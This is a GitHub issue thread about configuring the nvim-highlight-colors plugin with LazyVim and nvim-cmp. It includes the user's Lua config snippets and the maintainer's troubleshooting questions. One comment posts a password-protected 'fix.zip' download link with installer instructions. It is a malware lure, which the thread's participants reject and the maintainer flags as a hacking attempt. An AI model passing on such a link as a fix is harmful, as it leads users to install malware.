### ISSUE TITLE
lazyvim setup

### ISSUE THREAD

**Issue by jbrodriguez** [brenoprata10/nvim-highlight-colors#120]
i have in /plugins, a nvim-highlight-colors.lua file with
```lua
return {
  {
    { "brenoprata10/nvim-highlight-colors" },
  },
}
```

then for nvim-cmp, i have

```lua
local cmp = require("cmp")
local highlight = require("nvim-highlight-colors")

return {
  -- modify borders
  {
    "hrsh7th/nvim-cmp",
    opts = {
      window = {
        completion = cmp.config.window.bordered(),
        documentation = cmp.config.window.bordered(),
      },
      formatting = {
        format = highlight.format,
      },
    },
  },
}
```
but i get an error about nvim-highlight-colors not found
![Screenshot 2024-08-26 at 09 33 03](https://github.com/user-attachments/assets/cc363354-1216-458e-8fd3-78f77324c480)

any suggestions ?

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jbrodriguez** [comment]
what ? wont do that for sure

**Comment by brenoprata10** [comment]
I have deleted "JONTY" comment as it's absolutelly a hacking attempt

**Comment by brenoprata10** [comment]
@jbrodriguez are you sure the plugin was installed and configured properly? what happens if you remove the nvim-cmp integration?

**Comment by jbrodriguez** [comment]
> @jbrodriguez are you sure the plugin was installed and configured properly? what happens if you remove the nvim-cmp integration?

right, i tried that at first, but it sort of did "nothing" ? what i mean, i opened a file with css vars and nothing was highlighted 

![Screenshot 2024-08-26 at 10 38 17](https://github.com/user-attachments/assets/1d2f1b1f-ed9c-4cdb-a18d-37e841238e38)

nvim-highlight-colors is loaded
![Screenshot 2024-08-26 at 10 39 11](https://github.com/user-attachments/assets/0ec1e6b3-b916-4788-bd6d-0daace299e17)

**Comment by brenoprata10** [comment]
Are you calling the setup function?
